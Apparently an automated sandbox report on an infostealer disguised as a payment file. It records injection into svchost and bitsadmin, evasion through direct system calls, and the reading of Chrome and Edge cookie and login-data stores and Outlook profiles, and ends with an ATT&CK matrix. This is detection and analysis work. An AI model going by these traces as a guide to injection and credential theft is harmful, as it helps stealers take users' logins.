                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]2_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]2_2_02F6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]2_2_02FBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]2_2_02FBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]2_2_02F649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]2_2_02FFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]2_2_02FC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]2_2_02FBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B9A66C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B881AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B881AC
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B88189 SetUnhandledExceptionFilter,0_2_00B88189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 3924Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread APC queued: target process: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28F008Jump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9B106 LogonUserW,0_2_00B9B106
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B63D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B63D19
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA411C SendInput,keybd_event,0_2_00BA411C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA74BB mouse_event,0_2_00BA74BB
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"Jump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B9A66C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00BA71FA
                Source: hvGvYDBEAaXP.exe, 00000004.00000002.3859919782.0000000001191000.00000002.00000001.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000000.2174493268.0000000001191000.00000002.00000001.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000006.00000000.2322678937.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: OUTSTANDING BALANCE PAYMENT.exe, hvGvYDBEAaXP.exe, 00000004.00000002.3859919782.0000000001191000.00000002.00000001.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000000.2174493268.0000000001191000.00000002.00000001.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000006.00000000.2322678937.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: hvGvYDBEAaXP.exe, 00000004.00000002.3859919782.0000000001191000.00000002.00000001.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000000.2174493268.0000000001191000.00000002.00000001.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000006.00000000.2322678937.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: hvGvYDBEAaXP.exe, 00000004.00000002.3859919782.0000000001191000.00000002.00000001.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000000.2174493268.0000000001191000.00000002.00000001.00040000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000006.00000000.2322678937.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B865C4 cpuid 0_2_00B865C4
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00BB091D
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BDB340 GetUserNameW,0_2_00BDB340
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B91E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B91E8E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B7DDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2255087515.0000000000A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2254901007.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859242171.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3861800488.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859423484.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859475868.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2255503523.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3860205283.00000000046F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_81
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_XP
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_XPe
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_VISTA
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_7
                Source: OUTSTANDING BALANCE PAYMENT.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2255087515.0000000000A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2254901007.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859242171.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3861800488.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859423484.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859475868.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2255503523.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3860205283.00000000046F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00BB8C4F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00BB923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
